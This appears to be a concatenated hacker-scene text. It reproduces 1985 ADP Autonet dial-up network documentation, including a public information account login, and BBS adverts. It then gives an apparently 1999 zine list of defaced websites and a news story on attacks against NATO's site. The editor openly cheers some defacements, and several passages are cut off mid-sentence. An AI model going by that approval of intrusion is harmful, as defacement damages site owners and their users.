                 NOTES           If no host exists at the given address or by  the
                                 given name, the user will receive the message:
                                         ?**No such host.
                                 If the subscribing host will not accept the char-
                                 ges, the user will receive the message:
                                       ?**User ID required.
                                          The ID Command
                 PURPOSE         The ID command identifies the user and requests a
                                 connection  to  the  host  associated  with  that
                                 user's  identification  code.  The  network  will
                                 require the user to enter a valid password before
                                 completing the connection. The  terminal  session
                                 is charged to the user.
                 GENERAL FORM    ID xxxxxxxxx
                                 xxxxxxxxx is an alphanumeric user  identification
                 EXAMPLE         Autonet Line 3130157042
                                 Command:[ ID 1234-567 ]
                                 CALL CONNECTED
                                 (Proceed with host log-on procedure.)
                 NOTES           To  connect  to  a  destination  other  than  the
                                 default host, use the C  command  in  conjunction
                                 with the ID command.
                 EXAMPLE         Autonet Line 3130157042
                                 Command:[ ID 2345-12;C 5555 ]
                                 CALL CONNECTED
                                 Proceed with the host log-on procedure.
                                           The H Command
                 PURPOSE         The H command prints a connection dialog  command
                                 summary  as  a  helpful reminder for users. The H
                                 command may be used in conjuction with other com-
                                 mands,  or  it  may  be  used as a single command
                                 PRIOR to issuing the C or  the  ID  commands.  If
                                 used  individually,  the  network will follow the
                                 summary display with a prompt  for  another  com-
                 GENERAL FORM    H
                 EXAMPLE         Autonet Line 3130157042
                                 Command:[ H ]
                                 Autonet displays Command Summary.
                 EXAMPLE         Autonet Line 3130157042
                                 Command:[ H;C 5555 ]
                                 Autonet displays Command Summary.
                                 CALL CONNECTED
                                 (Proceed with host system log-on procedures.)
                                           The T Command
                 PURPOSE         The T  command  identifies  the  use\}r's  terminal
                                 model so that the network can set certain operat-
                                 ing parameters to optimize the terminal's charac-
                                 teristics.  The  T command may be used in conjuc-
                                 tion with other commands, or it may be used as  a
                                 single  command  PRIOR to issuing the C or the ID
                                 commands. If used individually, the network  will
                                 establish  the correct parameters and will prompt
                                 for another command.
                 GENERAL FORM    T cn
                                 cn  is the alphanumeric code which identifies the
                                 terminal model.
                 EXAMPLE         Autonet Line 3130157042
                                 Command:[ T D1 ]
                                 (Autonet  establishes optimal parameters for ter-
                                 minal model.)
                 EXAMPLE         Autonet Line 3130157042
                                 Command:[ T D1;C 5555 ]
                                 Autonet  sets  optimal  parameters  for  terminal
                                 model and requests a connection to host 5555.
                 NOTES           A list of codes for commonly used terminal models
                                 appears in "HOW TO USE AUTONET" and under the op-
                                 tion TERMINAL in  Autonet's  on-line  information
                                 directory,   AID.   Contact  your  Autonet  Sales
                                 Specialist for further information.
       Another Great Directory from Hacker Supreme. (Ninja Squirrel /+\, Logan - 5,)
             (Zaphod Breeblebox, Silicon Rat, Lord Vision, Crazy Horse, Lancelot-1.)
       [ ------------------- Infinity-Cartel Alliance Network --------------------- ]
       [ The Cartel 1&2 Adventure/AE/BBS 5 meg ------ 206-825-6236, or 206-939-6162 ]
       [ Infinity's Edge Adventure/AE/Cat/BBS 10 meg ----------------- 805-683-2725 ]
       [ The Center Of Eternity BBS ---------------------------------- 817-496-1777 ]
       [ ---------- The Cartel #3 and The Cartel 20 Meg AE comming soon! ---------- ]
        Another file downloaded from:                               NIRVANAnet(tm)
        & the Temple of the Screaming Electron   Jeff Hunter          510-935-5845
        Rat Head                                 Ratsnatcher          510-524-3649
        Burn This Flag                           Zardoz               408-363-9766
        realitycheck                             Poindexter Fortran   415-567-7043
        Lies Unlimited                           Mick Freen           415-583-4102
          Specializing in conversations, obscure information, high explosives,
              arcane knowledge, political extremism, diversive sexuality,
              insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.
         Full access for first-time callers.  We don't want to know who you are,
          where you live, or what your phone number is. We are not Big Brother.
                                 "Raw Data for Raw Nerves"

       [ AUTONET SERIES (Section 2) ]
       @C 31340
       313 40 CONNECTED
       Autonet Line 3130158025
       Command: H
       The Autonet connection dialog commands are: 
       COMMAND FORMAT              FUNCTION              EXAMPLE 
       C nnnnnnnnnn   Requests a connection to a host    C 5555 
                      whose address is nnnnnnnnnn.        
       C cccccccccc   Requests a connection to a host    C NAME 
                      whose name is cccccccccc.           
       H              Prints this list of commands.      H 
       ID xxxxxxxxx   Identifies the user and re-        ID 1234-567
                      quests a  connection  to  the       
                      host  associated  with  the         
                      user's identity code xxxxxxxxx.     
       T cn           Identifies a terminal model by     T D1 
                      the terminal identity code cn.      
                      See the TERMINAL option of AID.     
         * Use a space to separate a command name and its parameter. 
         ** Use a semicolon (;) to separate commands which occupy the same line. 
         *** To access the Autonet Information Directory (AID):  
          Type: C ADPNS
          Use the account-user number: 1300-7777
          Use the password: AID
       Command: C ADPNS
       ADP Network Services
       Account-User Number--1300-7777
       Password: AID
       Job 45  Sys #161  Line 15825  02:02 EDT (06:02 GMT)  Fri 13-Sep-85
             ***  Welcome to AID - the Autonet Information Directory  ***
             AID is a free, public database of information  about  ADP's
             value-added  network  and data communications services.  To
             obtain a list of your options, please type 'HELP'.  Use the
             'HELP' command whenever you need assistance.
        ACCESS          - Third party network access information            
        AID             - Lists how to use AID                              
        AUTOMAIL        - Describes ADP's Computer Based Message System     
        BYE             - Exits from network and disconnects terminal       
        CHANGES         - Lists impending phone number changes              
        CONNECT         - Lists network connection procedures               
        DOCUMENT        - Lists Autonet publications                        
        DONE            - Exits from network and disconnects terminal       
        GLOSS           - Lists glossary of Autonet communications terms    
        HELP            - Lists this set of options                         
        INTERNATL       - International network access information          
        MESSAGES        - Lists network messages                            
        NEWS            - Lists Autonet news items and service bulletins    
        PHONE           - Lists network access phone numbers                
        2400BPS         - 2400 Baud dial-up access numbers                  
        TERMINAL        - Lists Autonet terminal identity codes             
        TEST            - Network and terminal test programs                
        TROUBLE         - Lists network trouble reporting procedures        
       Align paper and press the RETURN key.     
       Last Updated:  July 1985
       Last Reviewed: July 1985
       3 pages
       Autonet Communications Glossary
       Access Location     A city in which Autonet can be accessed through a
                           toll-free telephone call.
       AHIP                Asynchronous Host Interface Processor.  A com-
                           munication computer that connects a host computer
                           to Autonet.
       Asynchronous ASCII  A device consisting of a keyboard which represents
          Terminal         128 distinct characters (such as upper and lower case
                           alphabetics, numerals, punctuation and control
                           characters) and a display screen or printing mechanism.
                           The terminal is used to send data to, or receive data
                           from a computer by a start-stop transmission method.
       ATC                 Asynchronous Terminal Concentrator.  An Autonet
                           network access service arrangement which also
                           features local async ports for multiple terminals.
       Autonet             An Autonet access facility consisting of one
       Communication       or more network nodes.
       AutoWATS            A host interface arrangement for users whose
                           initial data communications needs are small.
                           The service provides subscribers with value-
                           added WATS service at 50% less than conventional
                           WATS lines.
       Bit                 The smallest unit of data.
       BPS                 Bits Per Second.  A rate of speed at which bits
                           are transmitted.
       CCITT               The International Consultative Committee
                           for Telegraphy and Telephony of the
                           International Telecommunications Union,
                           which recommends industry standards.
       Dial Back-up        A service option which establishes
                           a temporary circuit to route around line
                           or node failures.
       DTF                 Dedicated Terminal Facility.  An Autonet network
                           access service arrangement which features
                           a hardwired connection to an access port.
       Error Detection     A system which detects transmission errors
       and Correction      and causes data to be retransmitted un-
       Code                til it is received correctly.
       Front End           A device which performs communications processing
       Processor           and certain protocol functions before passing
                           data to the host.
       HAL                 Host Access Line.  A single leased line which
                           supports one simultaneous connection between
                           a host computer and a network node.
       HCF                 Host Communication Facility.  A leased com-
                           munication line which connects a host computer
                           to a network node.
       Host                A computer system which processes data,
                           as contrasted to a computer used for com-
                           munications purposes.
       Leased Access       A communication line used to con-
       Channel             nect client equipment to a port at an
                           Autonet Communication Center, or to a con-
       Modem               A device which converts digital signals to
                           analog form for transmission over tele-
                           phone lines.
       Node                An Autonet communication computer which
                           accepts and transmits packets, and performs
                           network access and interface functions.
       Non Prime           A cost-saving Public Dial-In service
       Subscription        option featuring reduced rates
                           during off-peak business hours.
       Packet              A unit of traffic on a packet-switching
                           network.  A packet consists of a destination
                           address, special control function characters,
                           error detection code, as well as message
                           data, all arranged in a special format.
       Packet-switching    Method of transmitting data between
                           client equipment by means of formated packets.
       Port                A communication interface between Autonet and
                           a terminal or host computer.
       Private Rotary      A service option which features access
                           to a number of access ports through a single
                           private number.
       Protocol            A pre-established order for the transfer
                           of data over a communications channel.
       Remote Access       A network connection which establishes
                           communication with data processing equipment
                           from a distant location.
       Traffic             Data transmitted between user terminals
                           and host computers via Autonet.
       Virtual Dedicated   A billing option which features a
       Ports               flat monthly rate in lieu of Public Dial-In
                           access and traffic charges.
       X.25                The industry standard packet-switching
                           protocol approved by the CCITT.
       XHIP                X.25 Host Interface Processor.  An Autonet
                           host interface service arrangement which
                           features multiple terminal access over a
                           single communication line.
       Another Great Directory from Hacker Supreme. (Ninja Squirrel /+\, Logan - 5,)
             (Zaphod Breeblebox, Silicon Rat, Lord Vision, Crazy Horse, Lancelot-1.)
       [ ------------------- Infinity-Cartel Alliance Network --------------------- ]
       [ The Cartel 1&2 Adventure/AE/BBS 5 meg ------ 206-825-6236, or 206-939-6162 ]
       [ Infinity's Edge Adventure/AE/Cat/BBS 10 meg ----------------- 805-683-2725 ]
       [ The Center Of Eternity BBS ---------------------------------- 817-496-1777 ]
       [ ---------- The Cartel #3 and The Cartel 20 Meg AE comming soon! ---------- ]
        Another file downloaded from:                               NIRVANAnet(tm)
        & the Temple of the Screaming Electron   Jeff Hunter          510-935-5845
        Rat Head                                 Ratsnatcher          510-524-3649
        Burn This Flag                           Zardoz               408-363-9766
        realitycheck                             Poindexter Fortran   415-567-7043
        Lies Unlimited                           Mick Freen           415-583-4102
          Specializing in conversations, obscure information, high explosives,
              arcane knowledge, political extremism, diversive sexuality,
              insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.
         Full access for first-time callers.  We don't want to know who you are,
          where you live, or what your phone number is. We are not Big Brother.
                                 "Raw Data for Raw Nerves"
       [ AUTONET SERIES (Section 3) ]
                 To optimize Autonet's treatment of your terminal, use the
                 identity  code suggested for your terminal model.   Enter
                 the code by using the optional T command during the Autonet
                 connection procedure. Autonet will interpret the code and
                 will automatically establish the most effective parameters
                 for the operating characteristics of your device.  In many
                 cases, parameters can be permanently set at the host instal-
                 lation, thereby eliminating the need to use the T command
                 In most cases,  if you are using an intelligent asynchro-
                 nous ASCII CRT, you may use code  D1.  Your  Autonet  Ac-
                 count Administrator,  the person in your organization who
                 handles Autonet matters, can advise you.  This list is a
                 representative sample of terminal types and does not sug-
                 gest that support is limited only to these terminals.  If
                 your terminal is unlisted, simply use the code associated
                 with a like-device.
                 Code    Terminal Model
                 D1      ADDS CONSUL 520, 580, 980
                 D1      ADDS ENVOY 620, REGENT SERIES
                 A1      ALANTHUS DATA TERMINAL T-133
                 A8                             T-300
                 A3                             T-1200
                 A2      ALANTHUS MINITERM
                 D1      AM-JACQUARD AMTEXT 425
                 D1      ANDERSON JACOBSEN 510
                 B1      ANDERSON JACOBSEN 630
                 B3      ANDERSON JACOBSEN 830, 832
                 B5      ANDERSON JACOBSEN 860, 880
                 D1      ANN ARBOR TERMINALS AMBASSADOR, 400S
                 D1      APPLE II
                 D1      ATARI 400, 800
                 D1      AT&T DATASPEED 40, 40/1, 40/2, 40/3
                 B3                     43
                 A8      CENTRONICS 761
                 D1      COMMODORE PET
                 D1      COMPU-COLOR II
                 A2      COMPUTER DEVICES CDI 1030
                 A8      COMPUTER DEVICES TELETERM 1132
                 A2      COMPUTER DEVICES MINITERM 1200 SERIES
                 A2      COMPUTER TRANSCEIVER EXECUPORT 300, 380, 3000
                 A9      COMPUTER TRANSCEIVER EXECUPORT 1200
                 A8      COMPUTER TRANSCEIVER EXECUPORT 4000
                 D1      CPT 6000, 8000
                 D1      DATAMEDIA ELITE
                 D1      DATAPOINT 1500,1800,2200,3000,3300,3600,3800
                 A1      DATA PRODUCTS PORTATERM
                 B3      DATA TERMINAL & COMMUNICATIONS DTC 300, 302
                 B3      DIABLO HYTERM
                 D1      DIGI-LOG 33 & TELECOMPUTER II
                 A8      DIGITAL EQUIPMENT LA 35-36, LA 120
                 D1      DIGITAL EQUIPMENT VT50, VT52, VT100, WS78, WS200
                 B3      GEN-COMM SYSTEMS 300
                 A5      GE TERMINET 30
                 A4      GE TERMINET 300
                 A3      GE TERMINET 120, 1200
                 D1      GENERAL TERMINAL GT-100A, GT-101, GT-110,
                                          GT-400, GT-400B
                 D1      HAZELTINE 1400, 1500, 2000
                 D3      HEWLETT PACKARD 2621
                 D1      HEWLETT PACKARD 2640 SERIES
                 D1      IBM 3101
                 D1      INFORMER 1304, D304
                 D1      INFOTON 100, 200, 400, VISTAR
                 D1      INTERTEC INTERTUBE II
                 D1      LANIER WORD PROCESSOR
                 D1      LEAR SIEGLER ADM SERIES
                 D1      LEXITRON 1202, 1303
                 A2      MEMOREX 1240
                 D1      MICOM 2000, 2001
                 D1      NBI 3000
                 A2      NCR 260
                 D1          761
                 D1      PERKIN-ELMER MODEL 1100, OWL, BANTAM
                 A8      PERKIN-ELMER CAROUSEL 300 SERIES
                 B3      QWINT SYSTEMS 700 SERIES TELEPRINTERS
                 D1      RADIO SHACK TRS 80
                 D1      RESEARCH INC. TELERAY
                 D1      TEKTRONIX 4002-4024
                 A1      TELETYPE MODEL 33, 35
                 D1      TELETYPE MODEL 40
                 B3      TELETYPE MODEL 43
                 D1      TELETYPE MODEL 40/1, 40/2, 40/3
                 A7      TEXAS INSTRUMENT 725
                 A2                       733
                 A6                       735
                 D1                       743, 745, 763, 765
                 B3                       820, 840
                 D1                       99/4
                 B1      TRENDATA 4000 (ASCII)
                 A2      TYMSHARE 110, 212
                 A8               315
                 B3               325
                 B4      UNIVAC DCT 500
                 D1      WANG 20, 25, 30, 015, 130, 145
                 A1      WESTERN UNION EDT 33, 35
                 A3                        300
                 A4                        1200
                 D1      XEROX 800, 850, 860
                 B3      XEROX 1700 SERIES
       Another Great Directory from Hacker Supreme. (Ninja Squirrel /+\, Logan - 5,)
             (Zaphod Breeblebox, Silicon Rat, Lord Vision, Crazy Horse, Lancelot-1.)
       [ ------------------- Infinity-Cartel Alliance Network --------------------- ]
       [ The Cartel 1&2 Adventure/AE/BBS 5 meg ------ 206-825-6236, or 206-939-6162 ]
       [ Infinity's Edge Adventure/AE/Cat/BBS 10 meg ----------------- 805-683-2725 ]
       [ The Center Of Eternity BBS ---------------------------------- 817-496-1777 ]
       [ ---------- The Cartel #3 and The Cartel 20 Meg AE comming soon! ---------- ]
        Another file downloaded from:                               NIRVANAnet(tm)
        & the Temple of the Screaming Electron   Jeff Hunter          510-935-5845
        Rat Head                                 Ratsnatcher          510-524-3649
        Burn This Flag                           Zardoz               408-363-9766
        realitycheck                             Poindexter Fortran   415-567-7043
        Lies Unlimited                           Mick Freen           415-583-4102
          Specializing in conversations, obscure information, high explosives,
              arcane knowledge, political extremism, diversive sexuality,
              insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.
         Full access for first-time callers.  We don't want to know who you are,
          where you live, or what your phone number is. We are not Big Brother.
                                 "Raw Data for Raw Nerves"
       [ AUTONET SERIES (Section 4) ]
                                       Autonet Publications
                 Autonet's Sales Specialist has no doubt supplied you with various
                 documents   that  describe  our  services.  When  you  become  an
                 authorized user of  Autonet,  you  will  also  be  supplied  with
                 documentation that describes how to use our services.
                 If you would like  additional  copies  of  Autonet  publications,
                 please  contact  the  Autonet Marketing Services Administrator at
                 313/769-6800. ext. 6742.
                  DOCUMENT NUMBER  TITLE                                 PRICE
                  310-2.5-184      Autonet Price Schedule                $  .50
                                   Autonet Capabilities Overview         $  .50
                  310-1.3-483      Autonet Service Guide                 $ 1.00
                  310-1.4-583      Autonet X.3 Parameters                $  .25
                  310-1.5-1183     International Access                  $  .25
                  310-1.6-1182     Autonet X.25 Interface                $  .25
                  310-1.7-185      AutoWATS                              $  .25
                  310-1.9-185      How To Use Autonet                    $ 1.25
                  320-1-682        Autonet CCL Manual                    $ 8.00
                  310-2.6-184      Autonet Discount Schedule             $  .25
                  310-2.9-1084     Autonet Interim HCF                   $  .25
                  21-1.4-683       Introduction to AutoMail              $  .25
                  21-2.2-284       AutoMail Price Schedule               $  .25
                  310-3.1-1184     Autonet Terminal Reference Card       $  .10
                  310-3.0-1184     Autonet Detailed Usage Report --    
                                       Autonote                          $  .25
                 If you have any questions, or need additional information, please
                 contact us via our Ann Arbor headquarters at 313/769-6800.
                                         Autonet Messages
                 Autonet displays various messages at your  terminal  to  indicate
                 whether or not you have been successful in establishing a connec-
                 tion to the network or to your host computer. If  you  experience
                 trouble, please report the problem to your designated contact and
                 specify which message your received.
                 CALL CONNECTED
                 Your call has been connected.
                 CALL CLEARED
                 Indicates a normal disconnect. Disconnects resulting  from  other
                 causes will appear in the format
                              ?**CALL CLEARED BY HOST. CODE:ccc-ddd
                                  ?**CALL CLEARED.  CODE:ccc-ddd
                 where ccc is the cause code, and ddd is the diagnostic code  used
                 by Network Control for problem identification and resolution.
                 ?**NO SUCH HOST:xxxxxxxxxx
                 PLEASE TRY AGAIN.
                 No host exists by the name of address of xxxxxxxxxx.  Check  your
                 entry for typographical errors.
                 ?**HOST NOT AVAILABLE. CODE:9-133
                 The host interface is temporarily not in service.
                 You  must  use  the ID command with your assigned user number and
                 password to connect to this host.
                 ?**THIS DESTINATION HOST IS BUSY. CODE:1-132
                 Please contact Autonet Client Services.
                 ?**YOU HAVE BEEN DISCONNECTED. CODE:5-143
                 The network path to  the  host  computer  has  been  down  for  3
                 minutes,  automatically  disconnecting  the call. Hang up and try
                 ?**ALL HOST PORTS IN USE. CODE:1-130
                 The network is fully operational, but all connections between the
                 network and the host are in use. Try again in a few minutes.
                 ?**HOST PORT IS NOT RESPONDING. CODE:9-128
                 A  port on the destination host is not responding. Please contact
                 your Autonet Administrator.
                 ?**HOST IS NOT RESPONDING. CODE:9-129
                 The network is fully operational, but the host computer  is  down
                 or  not  responding. Please try again in a few minutes or contact
                 your Autonet Administrator.
                 ?**INPUT LOST
                 The network's capacity to accept input has been  exceeded.  Enter
                 the information again.
                 PLEASE TRY LATER.
                 The path from this access point to  the  host  computer  is  tem-
                 porarily inoperative. Try again in a few minutes.
                 ?**CCL ERROR:
                 A CCL command which contains an error has  been  entered  at  the
                 terminal  or  has  been  sent  by the host computer. Refer to the
                 Autonet CCL Manual command documentation and make the correction.
       Another Great Directory from Hacker Supreme. (Ninja Squirrel /+\, Logan - 5,)
             (Zaphod Breeblebox, Silicon Rat, Lord Vision, Crazy Horse, Lancelot-1.)
       [ ------------------- Infinity-Cartel Alliance Network --------------------- ]
       [ The Cartel 1&2 Adventure/AE/BBS 5 meg ------ 206-825-6236, or 206-939-6162 ]
       [ Infinity's Edge Adventure/AE/Cat/BBS 10 meg ----------------- 805-683-2725 ]
       [ The Center Of Eternity BBS ---------------------------------- 817-496-1777 ]
       [ ---------- The Cartel #3 and The Cartel 20 Meg AE comming soon! ---------- ]
        Another file downloaded from:                               NIRVANAnet(tm)
        & the Temple of the Screaming Electron   Jeff Hunter          510-935-5845
        Rat Head                                 Ratsnatcher          510-524-3649
        Burn This Flag                           Zardoz               408-363-9766
        realitycheck                             Poindexter Fortran   415-567-7043
        Lies Unlimited                           Mick Freen           415-583-4102
          Specializing in conversations, obscure information, high explosives,
              arcane knowledge, political extremism, diversive sexuality,
              insane speculation, and wild rumours. ALL-TEXT BBS SYSTEMS.
         Full access for first-time callers.  We don't want to know who you are,
          where you live, or what your phone number is. We are not Big Brother.
                                 "Raw Data for Raw Nerves"

  H.W  Hacked websites 

     Note: The hacked site reports stay, especially with some cool hits by
           groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

         * Hackers Against Racist Propaganda (See issue #7)
       With the war in Kosovo, many attacks on NATO related sites ...
       April 2nd NASA Site hacked by Russians
       by BHZ, Friday 3rd Apr 1999 on 1.00 am CET
       Well actually no they don't, but if you see one of NASA sites, hacked
       (http://wireless.jpl.nasa.gov/nato.html), you'll see a funny image of them. Yet another
       From Russia With Love hack. Page stated some messages against NATO.

       April 1st NATO website hit by Yugoslav hackers
       NATO Web site hit by Yugoslav  hackers
       By Tom Diederich
       From Computerworld
       This story is below

        As NATO warplanes continued their bombing campaign over Yugoslavia this week, PC users in Belgrade were
        striking back with cyberwarfare tactics -- pings, spam and virus-infected e-mail -- aimed at crippling the
        alliance's public-information Web site, a NATO spokesman said Wednesday. 

        "Basically, three things have happened that have made access [to the site] erratic, the first being a so-called
        ping bombardment, which began Saturday," the spokesman said in a telephone interview from Brussels.
        "Ping" is actually a legitimate program that sends out an electronic ping to another computer to see if the other
        system is available to communicate. Hackers have used the function to flood target systems, making them
        unavailable to legitimate users. 

        The ping bombardment, traced to computers in Belgrade -- as were "the vast majority of the attacks" --
        saturated lines and disrupted site access, according to the spokesman, who requested anonymity. 

        Belgrade's next cybersalvo was launched soon afterward -- a payload of spam. The same e-mail
        message, sent thousands of times daily, was short and  to the point: "It said 'F--- You!' each time," the
        spokesman said. 

        The third attack was in the form of macro viruses hidden inside e-mail attachments. "We've since installed
        antivirus software, which has been effective in combating the viruses," he said. "In fact, we have
        measures in place that successfully counter all of the attacks." He stressed that NATO servers had in no way
        been "hacked." 

        Attacks were limited to NATO's public information site, the NATO spokesman said. "And there is no direct link
        whatsoever ... between the NATO classified networks and our Internet configuration, so NATO networks have
        not been hit by this." 

        Although the spokesman said Belgrade's alleged attacks on NATO's Web site were now being
        successfully thwarted, he admitted that configuration troubles with a new server -- coupled with a 100% spike
        in traffic from people worldwide seeking information on NATO operations in Yugoslavia -- were causing
        connection problems. 

        Some attempts to visit NATO's Web site Wednesday evening ended up at a page that said: "Server closed.
        Description: Unable to connect to the site 'www.nato.int' for the document 'http://www.nato.int/'. The site is down,
        overloaded or unreachable. Try connecting again later." 

       Forwarded From: William Knowles 
       [HSX.com] (3.30.99) The websites of two hot young actors were recently
       hacked. All right movie buffs, if you're fans of Ben Affleck (BAFFL) and
       Matt Damon (MDAMO), then you've probably visited their fan sites at
       www.ben-affleck.com and www.matt-damon.com, respectively.  These sites
       have the standard photographs of the bare-chested actors on their home
       page along with links to articles and stories about their upcoming and
       past projects.
       A few weekends ago, a computer geek with far too much time on his hands
       hacked into their sites and posted some lewd and crude commentary about
       Damon and Affleck's sexual preference. A rumor quickly spread throughout
       Hollywood that Affleck was indeed gay. By far the lighter of the two
       diatribes was posted on Damon's website. It read as follows: 
       "Hi, this is Matt Damon... My lover Ben and I would like to ask the entire
       homosexual community to support Kevin Mitnick and get him released from
       You might recall that Kevin Mitnick (www.kevinmitnick.com) was the famous
       hacker who eluded authorities for years and was finally caught a couple of
       years back.  After breaking into government computers, he has been held in
       a federal prison for four years without a trial.
       Now, the fan site hacker didn't stop there in his support of Mitnick and
       his prank on the two actors. On Affleck's site he posted a profane "quote"
       from the Forces of Nature (FORCS) star supposedly explaining why Matt
       convinced him to speak out on behalf of the jailed Mitnick.  Needless to
       say, the "reasons" were a tad too racy to reprint here.
       Obviously Affleck and Damon did not post such rantings themselves and they
       have had no official comment. As for the hackers, if they wanted to bring
       attention to the Mitnick case, they probably would have better served
       their role model with postings that didn't display their own sexual
       phobias. The fan site hacker(s) are still at large.
       Subscribe: mail majordomo@repsec.com with "subscribe isn".
       Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
     Heres a nice overview of recent *relevant* hacks and sourced from the
     http://www.freespeech.org/resistance/ site .... thanks guys for a nice
     piece of work, keep it up! see the special section for some texts on
     hacktivism largely sourced from this site for this issue. and keep
     checking back to their site for news on upcoming events and hacks -Ed
     From the website;
     "This website is dedicated to all the hackers who use their work to fight against injustice, oppression, racism and censorship.

     Some years ago it turned to be a new challenge for some hackers to hack and alter the homepages of companies, groups, organizations and even
     political parties - it started to become a kind of sport. Soon hackers realized that the internet is the perfect area to practice a kind of electronic civil
     disobedience without physically harming someone or something. This new movement came to fame by the new term "Hacktivism". Below you'll
     find an archive of some websites that got hacked by hacktivists since 1996, the pages aren't censored in any way and 100% in their original state.
     You'll find only pages which were hacked with a political message, not this lame script-kiddie stuff."
      1999 archive

         Victim               Date        Information
   windy.ama.noaa.gov       01/02/99   Site link: windy.ama.noaa.gov
                                        Volt of the Insecure Crew cracked a server of the U.S. Government.
   Chinese Universities     01/02/99   
                                       Since two hackers were sentenced to death in China there's a
                                       cyber-war declared against Chinese Government and Institutions.
                                       TouGong hacked some universities to protest the killing.
   Chinese Government       01/07/99   www.bd-mof.gov.cn
                                       The cyber-war against China goes on. Hackers from Poland and
                                       Croatia hacked the chinese government at www.bd-mof.gov.cn .
 www.china-window.com       01/08/99   www.china-window.com
                                       Another chinese site was cracked by gH aka gLobaL heLL . The
                                       hacked page includes a rant adressed to milw0rm and LoU .
  humanrights-china.org     01/10/99   humanrights-china.org
                                       It seems that this site has a huge lack of security - it was hacked for
                                       the second time in three monts. This time the site was visited by NIS
                                       - Network Intrusion Specialists.
                                       This site was hacked because it contained child porn . There's no
                                       hint about the identity of the hacker but maybe a group called
                                       E.H.A.P - Ethical Hackers Against Pedophilia ( www.ehap.org ) who
                                       fights kiddie porn sites is responsible for this.
   Chinese Government      01/11/99    www.rftgd.gov.cn
                                       Another server of the Chinese Gov't ( www.rftgd.gov.cn ) was
                                       cracked by the Network Intrusion Specialists ( NIS ). Don't forget to
                                       read the hidden text in the source.
   Chinese Government      01/16/99    www.hcptt.gx.cn/
                                       The Chinese Ministry of Post and Telecommunications
                                       (www.hcptt.gx.cn) was defaced by a hacker who wants to remain
   Chinese Government      01/25/99    wenjin.nlc.gov.cn
                                       Pentaguard cracked wenjin.nlc.gov.cn and left a statement against
   Chinese Government      01/27/99    www.landbridge.gov.cn
                                       Another hack by Pentaguard, this time they hit the Chinese Gov't at
                                       http://www.landbridge.gov.cn .
       Ku Klux Klan        01/27/99
                                       The official homepage of the Ku Klux Klan ( www.kukluxklan.net )
                                       got hacked by S C R E A M, the OLM and H.A.R.P (Hackers Against
                                       Racist Parties). The original content was replaced with a statement
                                       against racism.
      Malaysian Gov't      02/01/99    www.go.com.jo
                                       A group named The Club seems to be the first who cracked a site in
     www.bcb.gov.bo       02/14/99     www.bcb.gov.bo
                                       BANCO CENTRAL DE BOLIVIA (Central Bank of Bolivia) was 0wned
                                       by dr_fdisk^.
   www.whitepride.com     02/19/99     www.whitepride.com
                                       Another fascist site bites the dust. This hack was brought to you by
                                       H.A.R.P (Hackers Against Racist Parties) the same group who
                                       cracked the Ku Klux Klan some weeks before.
   hollywoodbookstore     02/22/99     www.hollywoodbookstore.com
                                       "Security is an illusion" - TEAM SPL0IT proved this thesis for the
                                       domain www.hollywoodbookstore.com .
    www.comdex.com        02/22/99     www.comdex.com
                                       This site was hacked by E-pRoM, they claim freedom for MP3'z and
                                       Operating Systems.
    www.unjbg.edu.pe      02/24/99     www.unjbg.edu.pe
                                       two universities in peru, were compromised by Hi-Tech Hate. 
    State of Minnesota    02/27/99     www.stpaul.lib.mn.us
                                       The Saint Paul Public Library Web ( www.stpaul.lib.mn.us ) of
                                       Minnesota was hacked by kon, who seems to be a great fan of
                                       Governor Jesse Ventura.
    www.ieetam.org.mx     03/03/99     www.ieetam.org.mx
                                       Moskos Sex Hackers Team hacked www.ieetam.org.mx, it seems
                                       that mexico is becoming a new battlefield for hacktivists.
  www.pccreations.com     03/03/99     www.pccreations.com
                                       TEAM SPL0IT used this hack to tell the public about the risks of the
                                       built-in Processor Serial Number of the new Pentium III .
 www.chiapascee.org.mx    03/04/99     www.chiapascee.org.mx/">www.chiapascee.org.mx
                                       This mexican site was hacked by LyU99, a member of the new
                                       generation of hackers in mexico .
     Monica Lewinsky      03/04/99     www.monicalewinsky.com
                                       The domain www.monicalewinsky.com was hacked by the
                                       IRC.PSYCHIC.COM team. Come to think of it, when could we respect
  www.university.com.ar   03/10/99     http://www.university.com.ar
                                       dr_fdisk^ compromised some university sites in argentinia,
                                       www.university.com.ar was one of his victims.
    www.cndh.org.mx       03/11/99     www.cndh.org.mx
                                       alt3kx_H3z of team RazaMExicana cracked the website of the
                                       National Commission of Human Rights in Mexico.
 www.quickpress.com.ar    03/13/99     www.quickpress.com.ar
                                       Another page compromised by dr_fdisk^. The fight for Kevins
                                       freedom goes on, even in argentinia.
    Mexican Congress      03/13/99     at www.cddhcu.gob.mx
                                       DaCure of Moskoz Sex Hackers Team hacked the Mexican Congress
                                       at www.cddhcu.gob.mx .
       www.leute.at       03/14/99     www.leute.at
                                       TEAM SPL0IT hacked this austrian site to warn about the increasing
                                       pollution of our planet.
 www.mrshockwave.com      03/25/99     www.mrshockwave.com
                                       "tell your governments to stop the war" - TEAM SPL0IT protests the
                                       war in Serbia.
  www.toulouse.edu.pe     03/27/99     www.toulouse.edu.pe
                                       A university in peru which was hacked by another group one month
                                       before was now re-hacked by dr_fdisk^. It seems this site has a little
  nmimc1.med.navy.mil     03/27/99     nmimc1.med.navy.mil
                                       An alliance of the groups HDT, KpZ, CHC and Legion2000 called
                                       "Russian Hackers Union", cracked a server of the US Navy and
                                       replaced the original site with an anti-NATO message.
      www.anuies.mx       03/28/99     http://www.anuies.mx
                                       alt3kx_H3z hacked the homepage of the National Association of
                                       Universities and Higher Education in Mexico.

                  Free hosting for this website is provided by www.freespeech.org
                                    last update : 03/29/99

       For the most part these sites are gleaned from the rumours section of HNN
      unless otherwise noted and are just that, unconfirmed rumours... 

      contributed by Anonymous 
      Cracked March 26th'99
      Some high profile sites have been reported as cracked.
       March 28th weekend cracks from HNN rumours
       contributed by Anonymous 

       This was a relatively busy weekend for cracked web
       sites. Some sites where cracked in protest of recent
       NATO actions and some in support of it. Some sites
       where cracked for religious reasons and others for
       political activities in Mexico. We have recioeved reports
       that the following sites have been comprimised.

      Cracked sites March 30th
      contributed by Anonymous 
      The onslaught continues:
       Named in a post by Mea Culpa and mirrored on Attrition;
       Some of these are interesting as the crackers got more creative and
       included original poetry. Also funny is my old domain (lemming.com) got

      Domains hacked:

      contributed by Anonymous 
      April 1st
      Yes, all of these sites where reported as cracked. There
